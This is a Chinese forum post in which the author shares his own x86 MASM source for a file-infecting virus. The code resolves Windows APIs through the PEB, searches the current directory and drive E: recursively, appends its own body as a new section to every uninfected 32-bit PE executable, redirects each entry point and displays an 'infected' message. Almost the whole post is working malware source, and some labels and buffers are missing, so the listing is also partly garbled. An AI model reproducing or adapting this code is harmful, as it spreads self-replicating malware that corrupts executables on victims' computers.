[技术交流] 刚来鱼C的时候发过一篇汇编感染PE文件 现在再发一篇

发表于 2017-6-10 13:56:32


现在发一个我写的吧 过年的时候做的。

.model flat,stdcall
option casemap:none
include InfectPe.inc ;include windows.inc
        assume fs:nothing
        jmp Shell_
        Id                                dd        0
        FileOep                                dd        0
        JmpAddress                        dd        0
        aShell                                dd        0
        Kernel32                        dd        0
        _FindFirstFile                        dd        0
        _FindNextFile                        dd        0
        _LoadLibraryA                        dd        0
        _CreateFileA                        dd        0
        _MapViewOfFile                        dd        0
        _CreateFileMappingA                dd        0
        _GetFileSize                        dd        0
        _CloseHandle                        dd        0
        _UnmapViewOfFile                dd        0
        _FindClose                        dd        0
        _WriteFile                        dd        0
        _MessageBox                        dd        0
        _SetFilePointer                        dd        0
        _VirtualAlloc                        dd        0
        _VirtualFree                        dd        0
        _GetCurrentDirectory                dd        0
        _ReadFile                        dd        0
        NameOfKernel32                        db        'kernel32.dll',0
        NameOfUser32                        db        'user32.dll',0
        NameOfReadFile                        db        'ReadFile',0
        NameOfVirtualFree                db        'VirtualFree',0
        NameOfVirtualAlloc                db        'VirtualAlloc',0
        NameOfGetCurrentDirectory        db        'GetCurrentDirectoryA',0
        NameOfSetFilePointer                db        'SetFilePointer',0
        NameOfMessageBoxA                db        'MessageBoxA',0
        NameOfExitThread                db        'ExitProcess',0
        NameOfFindClose                        db        'FindClose',0
        NameOfCreateFile                db        'CreateFileA',0
        NameOfMapViewOfFile                db        'MapViewOfFile',0
        NameOfCreateFileMappingA        db        'CreateFileMappingA',0
        NameOfGetFileSize                db        'GetFileSize',0
        NameOfCloseHandle                db        'CloseHandle',0
        NameOfUnmapViewOfFile                db        'UnmapViewOfFile',0
        NameOfFindFirstFile                 db        'FindFirstFileA',0
        NameOfWriteFile                        db        'WriteFile',0
        NameOfFindNextFile                db        'FindNextFileA',0
        NameOfVirtualProtect                db        'VirtualProtect',0
        NameOfLoadLibraryA                db        'LoadLibraryA',0
        FileName                        db        MAX_PATH dup(0)
        AddName                                db        '\*.*',0
        AddName1                        db        '\',0
        DriveName                        db        '?:',0
        s                                db        '.',0
        ss_                                db        '..',0
        db 'Hello World!',0dh,0ah
        db 'Coded by _KaQqi',0dh,0ah
        db '    11:28',0dh,0ah
        db '2017 - 2 - 7',0
        sub esp,4
        call Shell
        pop ebp ;Shell的地址
        sub ebp,Shell - start ;程序的起始地址
        xor eax,eax
        xor eax,SehCallBack - start
        add eax,ebp
        sub esp,4
        xor edx,edx
        xor edx,dword ptr ss:[esp]
        xor dword ptr ss:[esp],edx
        xor dword ptr ss:[esp],eax
        sub esp,4
        xor eax,eax
        xor eax,dword ptr fs:[0]
        xor edx,edx
        xor edx,dword ptr ss:[esp]
        xor dword ptr ss:[esp],edx
        xor dword ptr ss:[esp],eax
        xor edx,edx
        xor edx,dword ptr fs:[0]
        xor dword ptr fs:[0],edx
        xor dword ptr fs:[0],esp
        push ebp
        mov [aShell - start + ebp],ebp
        call GetKernelBase
        mov eax,ebp
        add eax,NameOfLoadLibraryA - start
        push eax
        call GetKernelBase
        push eax
        call ShellGetProcAddress
        mov [_LoadLibraryA - start + ebp],eax
        mov eax,ebp
        add eax,NameOfKernel32 - start
        push eax
        mov eax,[_LoadLibraryA - start + ebp]
        call eax
        mov [Kernel32 - start + ebp],eax
        mov eax,ebp
        add eax,NameOfFindFirstFile - start
        push eax
        push [Kernel32 - start + ebp]
        call ShellGetProcAddress
        mov [_FindFirstFile - start + ebp],eax
        mov eax,ebp
        add eax,NameOfFindNextFile - start
        push eax
        push [Kernel32 - start + ebp]
        call ShellGetProcAddress
        mov [_FindNextFile - start + ebp],eax
        mov eax,ebp
        add eax,NameOfCreateFile - start
        push eax
        push [Kernel32 - start + ebp]
        call ShellGetProcAddress
        mov [_CreateFileA - start + ebp],eax
        mov eax,ebp
        add eax,NameOfGetFileSize - start
        push eax
        push [Kernel32 - start + ebp]
        call ShellGetProcAddress
        mov [_GetFileSize - start + ebp],eax
        mov eax,ebp
        add eax,NameOfCreateFileMappingA - start
        push eax
        push [Kernel32 - start + ebp]
        call ShellGetProcAddress
        mov [_CreateFileMappingA - start + ebp],eax
        mov eax,ebp
        add eax,NameOfMapViewOfFile - start
        push eax
        push [Kernel32 - start + ebp]
        call ShellGetProcAddress
        mov [_MapViewOfFile - start + ebp],eax
        mov eax,ebp
        add eax,NameOfUnmapViewOfFile - start
        push eax
        push [Kernel32 - start + ebp]
        call ShellGetProcAddress
        mov [_UnmapViewOfFile - start + ebp],eax
        mov eax,ebp
        add eax,NameOfCloseHandle - start
        push eax
        push [Kernel32 - start + ebp]
        call ShellGetProcAddress
        mov [_CloseHandle - start + ebp],eax
        mov eax,ebp
        add eax,NameOfFindClose - start
        push eax
        push [Kernel32 - start + ebp]
        call ShellGetProcAddress
        mov [_FindClose - start + ebp],eax
        mov eax,ebp
        add eax,NameOfMessageBoxA - start
        push eax
        mov eax,ebp
        add eax,NameOfUser32 - start
        push eax
        call dword ptr cs:[_LoadLibraryA - start + ebp]
        push eax
        call ShellGetProcAddress
        mov [_MessageBox - start + ebp],eax
        mov eax,ebp
        add eax,NameOfWriteFile - start
        push eax
        push [Kernel32 - start + ebp]
        call ShellGetProcAddress
        mov [_WriteFile - start + ebp],eax
        mov eax,ebp
        add eax,NameOfSetFilePointer - start
        push eax
        push [Kernel32 - start + ebp]
        call ShellGetProcAddress
        mov [_SetFilePointer - start + ebp],eax
        mov eax,ebp
        add eax,NameOfGetCurrentDirectory - start
        push eax
        push [Kernel32 - start + ebp]
        call ShellGetProcAddress
        mov [_GetCurrentDirectory - start + ebp],eax
        mov eax,ebp
        add eax,NameOfVirtualAlloc - start
        push eax
        push [Kernel32 - start + ebp]
        call ShellGetProcAddress
        mov [_VirtualAlloc - start + ebp],eax
        mov eax,ebp
        add eax,NameOfVirtualFree - start
        push eax
        push [Kernel32 - start + ebp]
        call ShellGetProcAddress
        mov [_VirtualFree - start + ebp],eax
        mov eax,ebp
        add eax,NameOfReadFile - start
        push eax
        push [Kernel32 - start + ebp]
        call ShellGetProcAddress
        mov [_ReadFile - start + ebp],eax
        call ShellStart
        mov eax,dword ptr cs:[FileOep - start + ebp]
        .if eax == NULL
                mov eax,ebp
                add eax,NameOfExitThread - start
                push eax
                push [Kernel32 - start + ebp]
                call ShellGetProcAddress
                mov [JmpAddress - start + ebp],eax
                push MB_OK
                push NULL
                lea eax,[END_MSG - start + ebp]
                push eax
                push NULL
                call dword ptr cs:[_MessageBox - start + ebp]
                push MB_OK
                push NULL
                lea eax,[END_MSG1 - start + ebp]
                push eax
                push NULL
                call dword ptr cs:[_MessageBox - start + ebp]
                mov eax,dword ptr fs:[30h]
                mov eax,dword ptr ds:[eax + 8h]
                add eax,dword ptr cs:[FileOep - start + ebp]
                mov [JmpAddress - start + ebp],eax
        xor edx,edx
        xor edx,dword ptr fs:[0]
        xor dword ptr fs:[0],edx
        xor edx,edx
        xor edx,dword ptr ss:[esp]
        xor dword ptr fs:[0],edx
        add esp,8
        add esp,40
        push dword ptr cs:[JmpAddress - start + ebp]
        sub esp,36
SehCallBack proc
        assume ebx:ptr CONTEXT
        mov ebx,dword ptr ss:[esp + 12] ;PCONTEXT参数
        xor eax,eax
        retn 16
SehCallBack endp
RtlGetAnsiStringLength proc lpString:DWORD
        LOCAL i:DWORD
        mov eax,i
        xor i,eax
        mov edi,lpString
        mov eax,i
        jmp @
        inc i
        mov eax,i
        cmp byte ptr ds:[edi + eax],NULL
        jnz _Loop
        mov eax,i
RtlGetAnsiStringLength endp
RtlCompareAnsiString proc ;比较两个ANSI字符串 相等返回1 不相等返回0 (stdcall)
        mov esi,dword ptr ss:[esp + 4]
        mov edi,dword ptr ss:[esp + 8]
        push ecx
        push esi
        call RtlGetAnsiStringLength
        push eax
        push edi
        call RtlGetAnsiStringLength
        mov ecx,eax
        pop eax
        xor eax,ecx
        cmove eax,ecx
        xor ebx,ebx
        xor ecx,eax
        mov ecx,eax
        cmovnz ecx,ebx
        repe cmpsb
        xor ebx,ebx
        inc ebx
        xor eax,eax
        cmove eax,ebx
        pop ecx
        retn 8
RtlCompareAnsiString endp
ShellGetProcAddress proc hModule:DWORD,lpBuffer:DWORD
        LOCAL i:DWORD
        mov esi,hModule
        assume esi:ptr IMAGE_DOS_HEADER
        add esi,[esi].e_lfanew
        assume esi:ptr IMAGE_NT_HEADERS32
        mov esi,[esi].OptionalHeader.DataDirectory.VirtualAddress
        add esi,hModule
        assume esi:ptr IMAGE_EXPORT_DIRECTORY
        mov ecx,[esi].NumberOfNames ;导出函数的名字的个数
        mov edx,[esi].AddressOfNames
        add edx,hModule
        push esi
        mov i,0
        mov eax,i
        mov edi,dword ptr ds:[edx + eax * sizeof DWORD]
        add edi,hModule
        push edi
        push lpBuffer
        call RtlCompareAnsiString
        and eax,eax
        xor ebx,ebx
        mov eax,ecx
        cmovnz ecx,ebx
        inc i ;计数
        test ecx,ecx
        jnz _Loop
        pop esi
        mov edx,eax
        xor eax,eax
        mov ecx,[esi].NumberOfNames
        xor ecx,i
        je Return
        mov ecx,i
        mov edx,[esi].AddressOfNameOrdinals
        add edx,hModule
        xor eax,eax
        mov ax,word ptr ds:[edx + ecx * sizeof WORD]
        dec eax
        mov edx,[esi].AddressOfFunctions
        add edx,hModule
        mov eax,dword ptr ds:[edx + eax * sizeof DWORD]
        add eax,hModule
        assume esi:nothing
ShellGetProcAddress endp
        LOCAL Old:DWORD
        mov eax,hModule
        add eax,NameOfVirtualProtect - start
        push eax
        call GetKernelBase
        push eax
        call ShellGetProcAddress
        lea edx,Old
        push edx
        push Shell_ - start
        push hModule
        call eax
GetKernelBase proc
        xor edx,edx 
        mov edx,dword ptr fs:[edx + 30h]
        mov edx,dword ptr ds:[edx + 0Ch]
        mov edx,dword ptr ds:[edx + 14h]
        mov esi,dword ptr ds:[edx + 28h]
        push 24
        pop ecx
        xor edi,edi
        xor eax,eax 
        cmp al,'a'
        jl not_lowercase
        sub al,20h
        ror edi,13
        add edi,eax
        loop loop_modname 
        cmp edi,6A4ABC5Bh
        mov ebx,dword ptr ds:[edx + 10h]
        mov edx,dword ptr ds:[edx]
        jnz next_mod
        mov eax,ebx
GetKernelBase endp
ShellStart proc;Shell入口
        call MyCall
ShellStart endp
MyCall proc
        call CallNext
CallNext: ;得到Shell入口
        pop edx
        sub edx,5
        sub edx,MyCall - start
        push edx
        push edx
        mov eax,FileName - start
        add eax,edx
        push eax
        push sizeof FileName
        call dword ptr cs:[_GetCurrentDirectory - start + edx]
        pop edx
        lea eax,MyFileCallBack
        sub eax,start
        add eax,edx
        push eax ;回调函数
        lea eax,[FileName - start + edx]
        push eax
        push edx
        call ShellFindFile
        pop edx
        mov eax,DriveName - start
        add eax,edx
        mov byte ptr ds:[eax],'E'
        lea eax,MyFileCallBack
        sub eax,start
        add eax,edx
        push eax ;回调函数
        lea eax,[DriveName - start + edx]
        push eax
        push edx
        call ShellFindFile
MyCall endp
_ZeroMemory proc Destination:DWORD,MemoryLength:DWORD
        mov edx,Destination
        xor ecx,ecx
        .while ecx != MemoryLength
                mov al,byte ptr ds:[edx + ecx]
                xor byte ptr ds:[edx + ecx],al
                inc ecx
_ZeroMemory endp
ShellFindFile proc hModule:DWORD,lpFileNameString:DWORD,CallBackFunction:DWORD
        LOCAL FindFileData:WIN32_FIND_DATA
        LOCAL FindHandle:DWORD
        LOCAL MyBool:BOOL
        LOCAL MyFile1[MAX_PATH]:CHAR
        push lpFileNameString
        call RtlGetAnsiStringLength
        push eax ;长度
        push lpFileNameString
        lea eax,MyFile1
        push eax
        call RtlCopyAnsiString
        mov eax,hModule
        add eax,AddName - start
        push eax
        lea eax,MyFile1
        push eax
        call RtlAddAnsiString
        lea eax,FindFileData
        push eax
        lea eax,MyFile1
        push eax
        mov eax,hModule
        call dword ptr cs:[_FindFirstFile - start + eax]
        .if eax != INVALID_HANDLE_VALUE
                mov FindHandle,eax
                        assume edx:ptr WIN32_FIND_DATA
                        lea edx,FindFileData
                        lea ebx,[edx].cFileName
                        mov eax,hModule
                        add eax,s - start
                        push eax
                        push ebx
                        call RtlCompareAnsiString
                        xor eax,1
                        je Next
                        lea edx,FindFileData
                        lea ebx,[edx].cFileName
                        mov eax,hModule
                        add eax,ss_ - start
                        push eax
                        push ebx
                        call RtlCompareAnsiString
                        xor eax,1
                        je Next
                        lea edx,FindFileData
                        mov eax,[edx].dwFileAttributes
                        and eax,FILE_ATTRIBUTE_DIRECTORY
                        .if eax != NULL ;目录
                                push lpFileNameString
                                call RtlGetAnsiStringLength
                                push eax ;长度
                                push lpFileNameString
                                lea eax,File
                                push eax
                                call RtlCopyAnsiString
                                mov eax,hModule
                                add eax,AddName1 - start
                                push eax
                                lea eax,File
                                push eax
                                call RtlAddAnsiString
                                lea edx,FindFileData
                                lea eax,[edx].cFileName
                                push eax
                                lea eax,File
                                push eax
                                call RtlAddAnsiString
                                push CallBackFunction
                                lea eax,File
                                push eax
                                push hModule
                                call ShellFindFile
                        .else ;回调函数
                                push lpFileNameString
                                call RtlGetAnsiStringLength
                                push eax ;长度
                                push lpFileNameString
                                lea eax,MyFile
                                push eax
                                call RtlCopyAnsiString        
                                mov eax,hModule
                                add eax,AddName1 - start
                                push eax
                                lea eax,MyFile
                                push eax
                                call RtlAddAnsiString
                                lea edx,FindFileData
                                lea eax,[edx].cFileName
                                push eax
                                lea eax,MyFile
                                push eax
                                call RtlAddAnsiString
                                lea eax,MyFile
                                push eax
                                push hModule
                                call CallBackFunction
                        assume edx:nothing
Next: ;循环尾
                        lea eax,FindFileData
                        push eax
                        push FindHandle
                        mov eax,hModule
                        call dword ptr cs:[_FindNextFile - start + eax]
                        mov MyBool,eax
                .until MyBool == FALSE
        push FindHandle
        mov eax,hModule
        call dword ptr cs:[_FindClose - start + eax]
ShellFindFile endp
MyFileCallBack proc hModule:DWORD,lpFileNameString:DWORD ;枚举文件的回调函数
        LOCAL Written:DWORD
        LOCAL dwFileSize:DWORD
        LOCAL hFile:DWORD
        LOCAL hMap:DWORD
        LOCAL lpBuffer:DWORD
        LOCAL SectionAlignment:DWORD
        LOCAL FileAlignment:DWORD
        LOCAL nSec:WORD ;区块个数
        LOCAL PointerToRawData:DWORD
        LOCAL VirtualAddress:DWORD
        LOCAL dwShellSize:DWORD
        LOCAL AddressOfEntryPoint:DWORD ;入口点
        LOCAL IsShell:DWORD ;是否是本体
        LOCAL Overlay:DWORD ;附加数据
        LOCAL SizeOfOverlay:DWORD ;附加数据大小
        LOCAL Read:DWORD
        mov Overlay,NULL
        mov eax,END_
        sub eax,start
        mov dwShellSize,eax
        push NULL
        push OPEN_EXISTING
        push NULL
        push FILE_SHARE_READ
        mov eax,GENERIC_READ
        or eax,GENERIC_WRITE
        push eax
        push lpFileNameString
        mov eax,hModule
        call dword ptr cs:[_CreateFileA - start + eax]
        cmp eax,INVALID_HANDLE_VALUE
        je Exit_Ret
        mov hFile,eax ;文件句柄
        push NULL
        push eax
        mov eax,hModule
        call dword ptr cs:[_GetFileSize - start + eax]
        or eax,eax
        je Closed
        mov dwFileSize,eax
        push NULL
        push dwFileSize
        push NULL
        push PAGE_READWRITE
        push NULL
        push hFile
        mov eax,hModule
        call dword ptr cs:[_CreateFileMappingA - start + eax]
        cmp eax,INVALID_HANDLE_VALUE
        je Closed
        mov hMap,eax
        push dwFileSize
        push NULL
        push NULL
        mov eax,FILE_MAP_READ
        or eax,FILE_MAP_WRITE
        push eax
        push hMap
        mov eax,hModule
        call dword ptr cs:[_MapViewOfFile - start + eax]
        or eax,eax
        je CloseFileMapping
        mov lpBuffer,eax
        assume esi:ptr IMAGE_DOS_HEADER
        mov esi,lpBuffer
        cmp [esi].e_magic,IMAGE_DOS_SIGNATURE
        jnz __UnMapViewOfFile
        mov esi,lpBuffer
        add esi,[esi].e_lfanew
        assume esi:ptr IMAGE_NT_HEADERS32
        cmp [esi].Signature,IMAGE_NT_SIGNATURE
        jnz __UnMapViewOfFile
        ;Intel x86 PE文件?
        cmp [esi].FileHeader.Machine,IMAGE_FILE_MACHINE_I386
        jnz __UnMapViewOfFile
        push esi
        push lpBuffer
        push hModule
        call IsInfected
        or eax,eax
        jnz __UnMapViewOfFile
        mov ax,[esi].FileHeader.NumberOfSections
        mov nSec,ax
        or ax,ax
        je __UnMapViewOfFile
        assume edi:ptr IMAGE_SECTION_HEADER
        lea edi,[esi].OptionalHeader
        xor eax,eax
        mov ax,[esi].FileHeader.SizeOfOptionalHeader
        add edi,eax
        xor eax,eax
        mov ax,nSec
        dec ax
        mov ebx,sizeof IMAGE_SECTION_HEADER
        mul ebx
        add edi,eax ;定位到最后一个区块
        mov eax,[edi].PointerToRawData
        add eax,[edi].SizeOfRawData
        .if eax < dwFileSize ;存在附加数据
                mov ebx,dwFileSize
                sub ebx,eax
                mov SizeOfOverlay,ebx
                push PAGE_EXECUTE_READWRITE
                push MEM_COMMIT
                push SizeOfOverlay
                push NULL
                mov eax,hModule
                call dword ptr cs:[_VirtualAlloc - start + eax]
                mov Overlay,eax
                mov edx,[edi].PointerToRawData
                add edx,[edi].SizeOfRawData
                push FILE_BEGIN
                push NULL
                push edx
                push hFile
                mov edx,hModule
                call dword ptr cs:[_SetFilePointer - start + edx]
                push NULL
                lea eax,Read
                push eax
                push SizeOfOverlay
                push Overlay
                push hFile
                mov edx,hModule
                call dword ptr cs:[_ReadFile - start + edx]
        mov eax,[esi].OptionalHeader.AddressOfEntryPoint
        mov AddressOfEntryPoint,eax
        lea edi,[esi].OptionalHeader.DataDirectory
        assume edi:ptr IMAGE_DATA_DIRECTORY
        xor eax,eax
        mov [edi].VirtualAddress,eax
        mov [edi].isize,eax
        lea edi,[esi].OptionalHeader.DataDirectory
        .if [edi].VirtualAddress != NULL
                mov ax,[esi].OptionalHeader.DllCharacteristics
                mov [esi].OptionalHeader.DllCharacteristics,ax
        xor eax,eax
        mov [edi].VirtualAddress,eax
        mov [edi].isize,eax
        lea edi,[esi].OptionalHeader.DataDirectory
        xor eax,eax
        mov [edi].VirtualAddress,eax
        mov [edi].isize,eax
        mov eax,[esi].OptionalHeader.SectionAlignment
        mov SectionAlignment,eax
        mov eax,[esi].OptionalHeader.FileAlignment
        mov FileAlignment,eax
        assume edi:ptr IMAGE_SECTION_HEADER
        lea edi,[esi].OptionalHeader
        xor eax,eax
        mov ax,[esi].FileHeader.SizeOfOptionalHeader
        add edi,eax
        xor eax,eax
        mov ax,nSec
        mov ebx,sizeof IMAGE_SECTION_HEADER
        mul ebx
        add edi,eax
        push sizeof IMAGE_SECTION_HEADER
        push edi
        call _ZeroMemory
        mov eax,sizeof IMAGE_SECTION_HEADER
        sub edi,eax
        mov eax,[edi].PointerToRawData
        add eax,[edi].SizeOfRawData
        mov PointerToRawData,eax ;新区块的PointerToRawData
        mov eax,[edi].VirtualAddress
        add eax,[edi].Misc.VirtualSize
        mov VirtualAddress,eax ;新区块的VirtualAddress
        mov eax,sizeof IMAGE_SECTION_HEADER
        add edi,eax
        push FileAlignment
        push PointerToRawData
        call PeAlign
        mov [edi].PointerToRawData,eax
        push SectionAlignment
        push VirtualAddress
        call PeAlign
        mov [edi].VirtualAddress,eax
        push FileAlignment
        push dwShellSize
        call PeAlign
        mov [edi].SizeOfRawData,eax
        push SectionAlignment
        push dwShellSize
        call PeAlign
        mov [edi].Misc.VirtualSize,eax
        push FileAlignment
        push dwShellSize
        call PeAlign
        mov dwShellSize,eax
        mov [edi].Characteristics,60000020h
        or eax,edx
        lea edx,[edi].Name1
        mov dword ptr ds:[edx],eax
        mov eax,[edi].VirtualAddress
        add eax,[edi].Misc.VirtualSize
        push SectionAlignment
        push eax
        call PeAlign
        mov [esi].OptionalHeader.SizeOfImage,eax
        inc [esi].FileHeader.NumberOfSections ;增加一个区块
        mov eax,hModule
        add eax,FileOep - start
        .if eax == NULL
                mov eax,AddressOfEntryPoint
                mov edx,hModule
                add edx,FileOep - start
                mov dword ptr ds:[edx],eax
                mov IsShell,12345678h
                mov eax,hModule
                add eax,FileOep - start
                push dword ptr ds:[eax] ;保存原OEP偏移
                mov eax,AddressOfEntryPoint
                mov edx,hModule
                add edx,FileOep - start
                mov dword ptr ds:[edx],eax
        push FILE_BEGIN
        push NULL
        push PointerToRawData
        push hFile
        mov edx,hModule
        call dword ptr cs:[_SetFilePointer - start + edx]
        push NULL
        lea eax,Written
        push eax
        push dwShellSize
        push hModule
        push hFile
        mov edx,hModule
        call dword ptr cs:[_WriteFile - start + edx]
        .if IsShell == 12345678h
                xor IsShell,12345678h
                mov eax,hModule
                add eax,FileOep - start
                pop dword ptr ds:[eax] ;恢复原OEP偏移
        push SectionAlignment
        push VirtualAddress
        call PeAlign
        mov [esi].OptionalHeader.AddressOfEntryPoint,eax
        .if Overlay != NULL
                push FILE_END
                push NULL
                push NULL
                push hFile
                mov edx,hModule
                call dword ptr cs:[_SetFilePointer - start + edx]
                push NULL
                lea eax,Written
                push eax
                push SizeOfOverlay
                push Overlay
                push hFile
                mov edx,hModule
                call dword ptr cs:[_WriteFile - start + edx]
                push MEM_DECOMMIT
                push SizeOfOverlay
                push Overlay
                mov eax,hModule
                call dword ptr cs:[_VirtualFree - start + eax]
                mov Overlay,NULL
        assume edi:nothing
        assume esi:nothing
        jmp __UnMapViewOfFile
        push lpBuffer
        mov eax,hModule
        call dword ptr cs:[_UnmapViewOfFile - start + eax]
        jmp CloseFileMapping
        push hMap
        mov eax,hModule
        call dword ptr cs:[_CloseHandle - start + eax]
        push hFile
        mov eax,hModule
        call dword ptr cs:[_CloseHandle - start + eax]
        jmp Exit_Ret
MyFileCallBack endp
PeAlign proc Number:DWORD,dwAlign:DWORD
        mov ecx,dwAlign
        mov eax,Number
        xor edx,edx
        div ecx
        or edx,edx
        je Aligned
        inc eax
        mul ecx
PeAlign endp
RtlCopyAnsiString proc lpString:DWORD,lpString1:DWORD,dwLength:DWORD
        mov edi,lpString
        mov esi,lpString1
        mov ecx,dwLength
        rep movsb
        mov ecx,dwLength
        add ecx,lpString
        mov byte ptr ds:[ecx],0
RtlCopyAnsiString endp
RtlAddAnsiString proc lpString:DWORD,lpString1:DWORD
        LOCAL len:DWORD
        push lpString
        call RtlGetAnsiStringLength
        push eax
        push lpString1
        call RtlGetAnsiStringLength
        mov len,eax
        pop eax
        add lpString,eax
        mov edi,lpString
        mov esi,lpString1
        mov ecx,len
        rep movsb
        mov edi,lpString
        add edi,len
        mov byte ptr ds:[edi],0
RtlAddAnsiString endp
RtlCompareMemoryByBytes proc lpBuffer:DWORD,lpBuffer1:DWORD,dwSize:DWORD ;比较两个内存 不相等返回0
        xor eax,eax
        mov ecx,dwSize
        mov edi,lpBuffer
        mov esi,lpBuffer1
        repe cmpsb
        xor edx,edx
        xor ecx,edx
        inc edx
        cmove eax,edx
        xor edx,edx
        cmovnz eax,edx
RtlCompareMemoryByBytes endp
IsInfected proc hModule:DWORD,lpBuffer:DWORD,pNtHeaders32:DWORD
        LOCAL dwReturn:DWORD
        LOCAL Oep:DWORD
        LOCAL Oep_VA:DWORD
        LOCAL nSec:WORD
        LOCAL FileAlignment:DWORD
        assume esi:ptr IMAGE_NT_HEADERS32
        mov esi,pNtHeaders32
        .if [esi].Signature != IMAGE_NT_SIGNATURE ;不是PE文件
                jmp Fail
                mov eax,dwReturn
                xor dwReturn,eax
                jmp Return
        ;不是Intel x86的PE文件
        cmp [esi].FileHeader.Machine,IMAGE_FILE_MACHINE_I386
        jnz Fail
        mov eax,[esi].OptionalHeader.FileAlignment
        mov FileAlignment,eax
        mov ax,[esi].FileHeader.NumberOfSections
        mov nSec,ax
        mov eax,[esi].OptionalHeader.AddressOfEntryPoint
        mov Oep,eax
        assume edi:ptr IMAGE_SECTION_HEADER
        lea edi,[esi].OptionalHeader
        xor eax,eax
        mov ax,[esi].FileHeader.SizeOfOptionalHeader
        add edi,eax
        xor eax,eax
                mov ebx,[edi].VirtualAddress
                .if Oep >= ebx
                        add ebx,[edi].Misc.VirtualSize
                        cmp ebx,Oep
                        ja Next
                add edi,sizeof IMAGE_SECTION_HEADER
                inc ax
        .until ax >= nSec
        ;RVA -> RAW
        push FileAlignment
        push [edi].PointerToRawData
        call PeAlign
        mov ebx,[edi].VirtualAddress
        sub ebx,Oep
        neg ebx
        add eax,ebx
        mov Oep,eax
        mov Oep_VA,eax
        mov eax,lpBuffer
        add Oep_VA,eax
        ;和Shell对比 不相等就说明没被感染
        push 5
        push Oep_VA
        push hModule
        call RtlCompareMemoryByBytes ;比较前五个字节
        or eax,eax
        je Fail
        add Oep_VA,Shell_ - start
        add hModule,Shell_ - start
        push END_ - Shell_
        push Oep_VA
        push hModule
        call RtlCompareMemoryByBytes ;比较剩下的代码
        or eax,eax
        je Fail
        mov dwReturn,1
        assume edi:nothing
        assume esi:nothing
        jmp Return
        xor eax,eax
        xor eax,dwReturn
IsInfected endp
        db 'File corrupted!. This program has been manipulated and maybe',0ah,0dh
        db 'it is infected by a Virus or cracked. This file will not work anymore.',0
        db 'Your files in your disk have been infected viruses by ',27h,'MyFirstFile',27h,'...',0
end start
